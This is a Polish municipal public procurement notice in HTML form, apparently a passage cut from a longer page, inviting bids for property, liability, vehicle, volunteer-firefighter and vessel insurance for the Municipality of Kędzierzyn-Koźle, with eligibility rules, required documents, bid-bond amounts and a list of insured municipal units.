                Wykonawca zobowiązany jest wykazać, że posiada zezwolenie na wykonywanie działalności ubezpieczeniowej, o którym mowa w art. art. 7 ust. 1 ustawy z dnia 11 września 2015 r. o działalności ubezpieczeniowej i reasekuracyjnej (Dz. U. z 2015 r. poz. 1844).<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. Zamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy Pzp do złożenia w szczególności następujących dokumentów:

1)W zakresie warunków udziału w postępowaniu:
W zakresie warunku posiadania uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów: zezwolenie organu nadzoru na wykonywanie działalności ubezpieczeniowej, o którym mowa w art. art. 7 ust. 1 ustawy z dnia 11 września 2015 r. o działalności ubezpieczeniowej i reasekuracyjnej (Dz. U. z 2015 r. poz. 1844), tzn. kopia zezwolenia Komisji Nadzoru Finansowego, bądź Ministra Finansów (jeżeli uzyskali zezwolenie przed 1 stycznia 2004) na prowadzenie działalności ubezpieczeniowej, lub potwierdzenie Komisji Nadzoru Finansowego o posiadaniu uprawnień do prowadzenia działalności ubezpieczeniowej (jeżeli rozpoczęli działalność przed 28-08-1990r.), lub inny dokument jak zezwolenie właściwego organu na wykonywanie działalności ubezpieczeniowej w państwie członkowskim Unii Europejskiej, w którym ten zakład ma siedzibę, potwierdzający posiadanie uprawnień do prowadzenia działalności ubezpieczeniowej w zakresie wszystkich grup ryzyk objętych przedmiotem zamówienia.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Formularz oferty, sporządzony na podstawie wzoru stanowiącego załącznik nr 1 do IDW;
2. Pełnomocnictwo do podpisywania oferty oraz do podpisywania innych dokumentów i oświadczeń składanych wraz z ofertą, jeżeli zasady reprezentacji nie wynikają jednoznacznie z dokumentu rejestracyjnego (ewidencyjnego). Treść pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonania których pełnomocnik jest upoważniony. Pełnomocnictwo winno być złożone w oryginale lub notarialnie poświadczonej kopii.
3. W przypadku Wykonawców wspólnie ubiegających się o zamówienie pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo do pełnienia takiej funkcji winno być podpisane przez prawnie upoważnionych przedstawicieli każdego z wykonawców występujących wspólnie i udzielających pełnomocnictwa, natomiast w przypadku spółki cywilnej przez każdego z jej wspólników. Wzór takiego pełnomocnictwa  załącznik Nr 5 do IDW. 
4.Dowód wniesienia wadium (jeżeli wymagane).
5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia: 
1)Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w tym także wspólnicy spółki cywilnej) ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia Umowy. Umocowanie musi wynikać z treści pełnomocnictwa przedłożonego wraz z ofertą.
2)Pełnomocnictwo powinno jednoznacznie określać postępowanie, do którego się odnosi i precyzować zakres umocowania, musi też wyliczać wszystkich wykonawców, którzy wspólnie ubiegają się o zamówienie. Każdy z tych Wykonawców musi podpisać się na dokumencie pełnomocnictwa. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
3)Każdy z Wykonawców wspólnie ubiegających się udzielenie zamówienia musi wykazać, że nie podlega wykluczeniu z postępowania, dlatego dokumenty i oświadczenia składane na potwierdzenie braku podstaw do wykluczenia składają samodzielnie wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia.
4)Oświadczenia stanowiące wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnienie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnienie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia.
5)Spełnienie warunków udziału w postępowaniu oceniane będzie łącznie.
6)Oświadczenie o przynależności albo braku przynależności do tej samej grupy kapitałowej powinno zostać przedstawione przez każdego członka Konsorcjum.
7)Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.
8)W przypadku wykonawców wspólnie ubiegających się o zamówienie (w tym spółki cywilnej), których oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani do zawarcia umowy cywilnoprawnej określającą rolę i zadania poszczególnych Wykonawców (osób) oraz zasady ich współdziałania podczas realizacji zamówienia. Zamawiający może żądać przedstawienia wyżej wskazanej umowy.
9)Niezależnie od postanowień umowy, o której mowa powyżej, w każdym przypadku Wykonawcy wspólnie ubiegających się o zamówienie (w tym spółki cywilnej):
- będą solidarnie i bezwarunkowo odpowiedzialne przed Zamawiającym za wykonanie Umowy, a solidarność ta nie będzie niczym wobec Zamawiającego ograniczona;
- powiadomią Zamawiającego o swoim partnerze wiodącym (Liderze), który będzie miał pełnomocnictwa do podejmowania decyzji wiążących Wykonawcę i każdą z tych osób i na adres którego doręczane będą wszelkie pisma i oświadczenia.
6. Wykonawca, w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, przekazuje Zamawiającemu oświadczenie o przynależności albo braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp (wzór stanowi załącznik nr 4 do IDW). Wraz ze złożeniem oświadczenia, w którym Wykonawca informuje o przynależności do tej samej grupy kapitałowej, Wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia publicznego.
7.Dokumenty podmiotów zagranicznych:
Zgodnie z art. 22b ust. 2 Ustawy Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej na wezwanie Zamawiającego musi udowodnić, że posiada on uprawnienia do prowadzenia działalności ubezpieczeniowej w swoim kraju pochodzenia.

WYMAGANIA FORMALNE W STOSUNKU DO DOKUMENTÓW:
1.Oświadczenia, dotyczące wykonawcy oraz dotyczące podwykonawców, składane są w oryginale.
2.Dokumenty inne niż oświadczenia, o których mowa w pkt 1. składane są w oryginale lub kopii poświadczonej za zgodność z oryginałem.
3.Poświadczenia za zgodność z oryginałem dokonuje odpowiednio wykonawca, podmiot, na którego zdolnościach lub sytuacji polega wykonawca, wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego albo podwykonawca, w zakresie dokumentów, które każdego z nich dotyczą.
4.Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
5.W przypadku wskazania przez Wykonawcę dostępności oświadczeń lub dokumentów, w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający pobierze samodzielnie z tych baz danych wskazane przez Wykonawcę oświadczenia lub dokumenty.
6.Zamawiający będzie wymagał od Wykonawcy przedstawienia tłumaczenia na język polski wskazanych przez Wykonawcę i pobranych samodzielnie przez Zamawiającego dokumentów.
7.Brak jakiegokolwiek z wymaganych dokumentów lub złożenie dokumentu niewłaściwie poświadczonego (np. nie poświadczenie klauzulą za zgodność z oryginałem odpisu lub kopii) spowoduje wezwanie przez zamawiającego do uzupełnienia dokumentów. Brak uzupełnienia dokumentów przez Wykonawcę w wyznaczonym terminie skutkował będzie wykluczeniem Wykonawcy z postępowania o udzielenie zamówienia lub odrzuceniem oferty, a także utratą wadium w przypadku okoliczności o których mowa z art. 46 ust. 4a ustawy Pzp.
8.Pełnomocnictwo należy złożyć w formie oryginału lub poświadczonej notarialnie za zgodność z oryginałem kopii wystawionej przez osoby do tego upoważnione. 
9.Uzupełnieniu zgodnie z przepisem art. 26 ust. 3 ustawy Pzp podlegają wyłącznie dokumenty o których mowa w  art. 25 ust. 1 ustawy Pzp. W tej sytuacji nie podlegają uzupełnieniu inne wymagane w IDW dokumenty takie jak np.: formularz oferty, dowód wniesienia wadium itp.
10.Wszelkie inne dokumenty nie wymagane przez Zamawiającego, a załączone przez Wykonawcę do oferty, nie będą brane pod uwagę przez Zamawiającego.
11.Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentów, o których mowa w rozporządzeniu, innych niż oświadczenia, wyłącznie wtedy, gdy złożona kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
12.Jeżeli okaże się to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia, Zamawiający może na każdym etapie postępowania wezwać wykonawców do złożenia wszystkich lub niektórych oświadczeń lub dokumentów potwierdzających, że nie podlegają wykluczeniu, spełniają warunki udziału w postępowaniu lub kryteria selekcji, a jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio oświadczenia lub dokumenty nie są już aktualne, do złożenia aktualnych oświadczeń lub dokumentów.

</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Oferta musi być zabezpieczona wadium w wysokości: 
CZĘŚĆ I 
Ubezpieczenie mienia od ognia i innych zdarzeń losowych,
Ubezpieczenie mienia od kradzieży z włamaniem i rabunku oraz od kradzieży zwykłej,
Ubezpieczenie sprzętu elektronicznego od wszystkich ryzyk,
Ubezpieczenie odpowiedzialności cywilnej,
Ubezpieczenie szyb od stłuczenia,
Ubezpieczenie następstw nieszczęśliwych wypadków,
Ubezpieczenie maszyn od uszkodzeń od wszystkich ryzyk.
Ubezpieczenie maszyn budowlanych od uszkodzeń.
 8 000,00 zł (słownie: osiem tysięcy złotych 00/100)
CZĘŚĆ II 
Ubezpieczenia komunikacyjne:
ubezpieczenie odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych,
ubezpieczenie auto casco,
ubezpieczenie następstw nieszczęśliwych wypadków kierowcy i pasażerów,
ubezpieczenie assistance.
 1 500,00 zł (słownie: tysiąc pięćset złotych 00/100)
CZĘŚĆ III 
Ubezpieczenie następstw nieszczęśliwych wypadków członków Ochotniczych Straży Pożarnych Gminy Kędzierzyn-Koźle:
- ubezpieczenie imienne,
- ubezpieczenie bezimienne.
 120,00 zł (słownie: sto dwadzieścia złotych 00/100)
CZĘŚĆ IV 
Ubezpieczenia jednostek pływających:
- ubezpieczenie casco 
- ubezpieczenie odpowiedzialności cywilnej 
- ubezpieczenie nnw pasażerów
 250,00 zł (słownie: dwieście pięćdziesiąt złotych 00/100)

1.Wadium należy wnieść przed upływem terminu składania ofert.
2.Wadium może być wnoszone w jednej lub kilku następujących formach:
1)pieniądzu: przelewem na rachunek bankowy Zamawiającego: PKO BP Kędzierzyn-Koźle 57 1020 3714 0000 4102 0108 5455;
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)gwarancjach bankowych;
4)gwarancjach ubezpieczeniowych;
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 r. poz. 1804 oraz z 2015 r. poz. 978 i 1240).
3. W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia, dokument taki musi być nieodwołalny, bezwarunkowy i płatny na pierwsze pisemne żądanie Zamawiającego, sporządzony zgodnie z obowiązującym prawem i winien zawierać następujące elementy:
1)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), nazwę gwaranta/poręczyciela (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedziby,
2)	określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,
3)	kwotę gwarancji/poręczenia,
4)	termin ważności gwarancji/poręczenia,
5)	zobowiązanie gwaranta/poręczyciela że Zamawiającemu służy prawo wypłaty wadium ze strony Gwaranta, w przypadkach określonych w art. 46 ust. 4a i 5.
3.Wadium wniesione w formie wymienionej w pkt. 2 ppkt 2-5 należy obowiązkowo ZAŁĄCZYĆ w ORYGINALE do oferty. Brak oryginału dokumentu przy ofercie traktowane będzie jako niezabezpieczenie oferty wadium.
4.Zamawiający zwraca wadium niezwłocznie wraz z odsetkami zgodnie z zasadami wynikającymi z art. 46 ustawy Pzp.
5.Zamawiający zatrzymuje wadium wraz z odsetkami zgodnie z art. 46, ust. 4a i 5 ustawy Pzp.
6.Wykonawca zobowiązany jest do ponownego wniesienia wadium na zasadach określonych w art. 46 ust. 3 ustawy Pzp.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Podstawa zakres, charakter i warunki wprowadzania zmian zostały wskazane w istotnych postanowieniach umowy część II SIWZ Istotne postanowienia umowy.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 29/11/2016, godzina: 13:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              j. polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Ubezpieczenie mienia i odpowiedzialności Gminy Kędzierzyn Koźle oraz komunalnych osób prawnych  w zakresie: Ubezpieczenie mienia od ognia i innych zdarzeń losowych, Ubezpieczenie mienia od kradzieży z włamaniem i rabunku oraz od kradzieży zwykłej, Ubezpieczenie sprzętu elektronicznego od wszystkich ryzyk, Ubezpieczenie odpowiedzialności cywilnej, Ubezpieczenie szyb od stłuczenia, Ubezpieczenie następstw nieszczęśliwych wypadków, Ubezpieczenie maszyn od uszkodzeń od wszystkich ryzyk. Ubezpieczenie maszyn budowlanych od uszkodzeń.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Ubezpieczenie mienia i odpowiedzialności Gminy Kędzierzyn Koźle oraz komunalnych osób prawnych  w zakresie:
Ubezpieczenie mienia od ognia i innych zdarzeń losowych,
Ubezpieczenie mienia od kradzieży z włamaniem i rabunku oraz od kradzieży zwykłej,
Ubezpieczenie sprzętu elektronicznego od wszystkich ryzyk,
Ubezpieczenie odpowiedzialności cywilnej,
Ubezpieczenie szyb od stłuczenia,
Ubezpieczenie następstw nieszczęśliwych wypadków,
Ubezpieczenie maszyn od uszkodzeń od wszystkich ryzyk.
Ubezpieczenie maszyn budowlanych od uszkodzeń.

w następujących jednostkach organizacyjnych Gminy Kędzierzyn-Koźle:
1. Urząd Miasta Kędzierzyn-Koźle, ul. Grzegorza Piramowicza 32, Kędzierzyn-Koźle
Wydział Administracyjno-Gospodarczy
Wydział Zarządzania Kryzysowego
Biuro Informacji i Promocji Miasta
Wydział Zarządzania Drogami 
Wydział Ochrony Środowiska i Rolnictwa
Straż Miejska 
2. Miejski Ośrodek Pomocy Społecznej, ul. Mikołaja Reja 2A, Kędzierzyn-Koźle
3. Zespół Obsługi Oświaty i Wychowania, ul. Mikołaja Reja 2, Kędzierzyn-Koźle;
4.	Żłobek nr 1, ul. Filtrowa 13, Kędzierzyn-Koźle 
5.	Żłobek nr 3, ul. Piotra Skargi 25, Kędzierzyn-Koźle
6.	Żłobek nr 6, ul. 1 Maja 7, Kędzierzyn-Koźle
7.	Żłobek nr 10, ul. Kazimierza Wielkiego 6, Kędzierzyn-Koźle
8.	Publiczne Przedszkole nr 2, ul. Kozielska 3, Kędzierzyn-Koźle
9.	Publiczne Przedszkole nr 5, ul. 1 Maja 5, Kędzierzyn-Koźle
10.	Publiczne Przedszkole nr 6, ul. Tadeusza Kościuszki 21, Kędzierzyn-Koźle
11.	Przedszkole Publiczne nr 7, ul. Jordanowska 16, Kędzierzyn-Koźle 
12.	Publiczne Przedszkole nr 8, ul. Romana Dmowskiego 5, Kędzierzyn-Koźle
13.	Publiczne Przedszkole nr 9, ul. Harcerska 16, Kędzierzyn-Koźle 
14.	Przedszkole Publiczne nr 10, ul. Władysława Broniewskiego 5, Kędzierzyn-Koźle
15.	Przedszkole Publiczne nr 11, ul. Mikołaja Reja 14, Kędzierzyn-Koźle
16.	Publiczne Przedszkole nr 12, ul. Bolesława Chrobrego 28, Kędzierzyn-Koźle
17.	Publiczne Przedszkole nr 13, ul. Piastowska 10, Kędzierzyn-Koźle
18.	Przedszkole Publiczne nr 14, ul. Franklina Delano Roosevelta 13, Kędzierzyn-Koźle
19.	Przedszkole Publiczne nr 15, ul. Spółdzielców 3, Kędzierzyn-Koźle
20.	Publiczne Przedszkole nr 17, ul. Karola Szymanowskiego 29, Kędzierzyn-Koźle
21.	Publiczne Przedszkole nr 18, ul. Sławięcicka 96 B, Kędzierzyn-Koźle
22.	Przedszkole Publiczne nr 21, ul. Filtrowa 13, Kędzierzyn-Koźle
23.	Przedszkole Publiczne nr 22 im. Czesława Janczarskiego, ul. 9 Maja 4, Kędzierzyn-Koźle
24.	Przedszkole Publiczne nr 23, ul. Wierzbowa 4, Kędzierzyn-Koźle
25.	Przedszkole Publiczne nr 24, ul. Leszka Białego 7, Kędzierzyn-Koźle
26.	Publiczne Przedszkole nr 26, ul. Bolesława Śmiałego 5, Kędzierzyn-Koźle
27.	Publiczna Szkoła Podstawowa nr 1 im. Powstańców Śląskich, ul. Kościelna 19, Kędzierzyn-Koźle 
28.	Publiczna Szkoła Podstawowa nr 5 im. Adama Mickiewicza, ul. Tadeusza Kościuszki 41, Kędzierzyn-Koźle
29.	Publiczna Szkoła Podstawowa nr 6 im. Marii Skłodowskiej-Curie, ul. Pawła Stalmacha 20, Kędzierzyn-Koźle
